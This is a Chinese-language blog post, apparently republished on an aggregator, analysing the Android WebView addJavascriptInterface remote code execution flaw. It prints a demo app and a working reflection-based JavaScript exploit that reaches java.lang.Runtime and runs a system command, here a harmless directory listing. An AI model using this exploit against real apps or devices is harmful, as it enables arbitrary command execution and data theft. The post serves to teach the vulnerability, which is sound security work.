Android WebView远程代码执行漏洞简析

Posted jltxgcy

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Android WebView远程代码执行漏洞简析相关的知识,希望对你有一定的参考价值。

   0x00

    本文参考Android WebView 远程代码执行漏洞简析。代码地址为,https://github.com/jltxgcy/AppVulnerability/tree/master/WebViewFileDemo。下面我们分析代码。

    

   0x01

    首先列出项目工程目录:

技术分享

    MainActivity.java的代码如下:

public class MainActivity extends Activity {
	private WebView webView;
	private Uri mUri;
	private String url;
	//String mUrl1 = "file:///android_asset/html/attack_file.html";
	String mUrl2 = "file:///android_asset/html/test.html";

	@Override
	protected void onCreate(Bundle savedInstanceState) {
		super.onCreate(savedInstanceState);
		setContentView(R.layout.activity_main);
		webView = (WebView) findViewById(R.id.webview);
		webView.getSettings().setjavascriptEnabled(true);
		webView.addJavascriptInterface(new JSInterface(), "jsInterface");
		//webView.getSettings().setAllowFileAccessFromFileURLs(true);
		webView.setWebChromeClient(new WebChromeClient() {
			@Override
			    public boolean onJsAlert(WebView view, String url, String message,JsResult result) {
			    //Required functionality here
			    return super.onJsAlert(view, url, message, result);
			}
		});
		webView.loadUrl(mUrl2);
	}
	
	
    class JSInterface {
        public String onButtonClick(String text) {
            final String str = text;
            runOnUiThread(new Runnable() {
                @Override
                public void run() {
                    Log.e("leehong2", "onButtonClick: text = " + str);
                    Toast.makeText(getApplicationContext(), "onButtonClick: text = " + str, Toast.LENGTH_LONG).show();
                }
            });
            
            return "This text is returned from Java layer.  js text = " + text;
        }
        
        public void onImageClick(String url, int width, int height) {
            final String str = "onImageClick: text = " + url + "  width = " + width + "  height = " + height;
            Log.i("leehong2", str);
            runOnUiThread(new Runnable() {
                @Override
                public void run() {
                    Toast.makeText(getApplicationContext(), str, Toast.LENGTH_LONG).show();
                }
            });
        }
    }

}
    其中下面的代码设置了,webView加载的html里面可以通过javaScript与java代码交互。

webView.getSettings().setJavaScriptEnabled(true);
		webView.addJavascriptInterface(new JSInterface(), "jsInterface");


    我们接着看加载的html文件,它位于aessets目录下。
webView.loadUrl(mUrl2);


    test.html如下:

<html>
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
    <script>
      var i=0;
      function getContents(inputStream)
      {
        var contents = ""+i;
        var b = inputStream.read();
        var i = 1;
        while(b != -1) {
            var bString = String.fromCharCode(b);
            contents += bString;
            contents += "\n"
            b = inputStream.read();
        }
        i=i+1;
        return contents;
       }
      
       function execute(cmdArgs)
       {
        for (var obj in window) {
            console.log(window[obj]);
            if ("getClass" in window[obj]) {
                alert(obj);
                return window[obj].getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
             }
         }
       } 
      
      var p = execute(["ls","/mnt/sdcard/"]);
      document.write(getContents(p.getInputStream()));
    </script>

    <script language="javascript">
      function onButtonClick() 
      {
        // Call the method of injected object from Android source.
        var text = jsInterface.onButtonClick("从JS中传递过来的文本!!!");
        alert(text);
      }

      function onImageClick() 
      {
        //Call the method of injected object from Android source.
        var src = document.getElementById("image").src;
        var width = document.getElementById("image").width;
        var height = document.getElementById("image").height;

        // Call the method of injected object from Android source.
        jsInterface.onImageClick(src, width, height);
      }
    </script>
  </head>

  <body>
      <p>点击图片把URL传到Java代码</p>
      <img class="curved_box" id="image" 
         onclick="onImageClick()"
         width="328"
         height="185"
         src="http://t1.baidu.com/it/u=824022904,2596326488&fm=21&gp=0.jpg"
         onerror="this.src=‘background_chl.jpg‘"/>
    </p>
    <button type="button" onclick="onButtonClick()">与Java代码交互</button>
  </body>
</html>
    关于html和javaScript的介绍,请参考http://www.w3school.com.cn/html/html_getstarted.asp

    这里面造成漏洞的主要原因在如下代码:

function execute(cmdArgs)
       {
        for (var obj in window) {
            console.log(window[obj]);
            if ("getClass" in window[obj]) {
                alert(obj);
                return window[obj].getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec(cmdArgs);
             }
         }
       } 
      
      var p = execute(["ls","/mnt/sdcard/"]);
    攻击者可以找到存在“getClass”方法的对象,然后通过反射的机制,得到Java Runtime对象,然后调用静态方法来执行系统命令。从而造成危害。

 这个程序的详细功能请自己下载代码运行后便知。

以上是关于Android WebView远程代码执行漏洞简析的主要内容,如果未能解决你的问题,请参考以下文章

Android Webview历史高危漏洞与攻击面分析

Android Webview历史高危漏洞与攻击面分析

每日日报2021.3.12

Android安全编码

Android 4.2版本以下使用WebView组件addJavascriptInterface方法存在JS漏洞

webview的学习总结: